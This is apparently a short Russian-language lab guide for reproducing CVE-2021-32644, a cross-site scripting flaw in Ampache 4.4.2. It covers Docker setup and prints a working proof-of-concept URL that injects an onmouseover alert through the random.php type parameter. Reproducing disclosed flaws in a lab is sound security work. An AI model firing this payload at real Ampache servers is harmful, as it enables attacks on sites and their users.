
Ampache XSS
Эта уязвимость — XSS, которая затрагивала версии Ampache до 4.4.3. https://nvd.nist.gov/vuln/detail/CVE-2021-32644
При установке выполните проброс портов в файле docker-compose.yml. Устанавливаемая версия Ampache — 4.4.2.
$docker-compose up
Перейдите по адресу http://[web-server ip]:port/.
Перейдите по адресу http://[web-server ip]:port/.
Настройте базу данных MySQL, как показано на рисунке ниже.

При вставке приведённого ниже PoC можно увидеть, что возникает XSS-уязвимость.
http://[ip]:port/random.php?action=get_advanced&type=%27%22%20onmouseover%3dalert(0x0002DE)%20

https://packetstormsecurity.com/files/163620/Ampache-4.4.2-Cross-Site-Scripting.html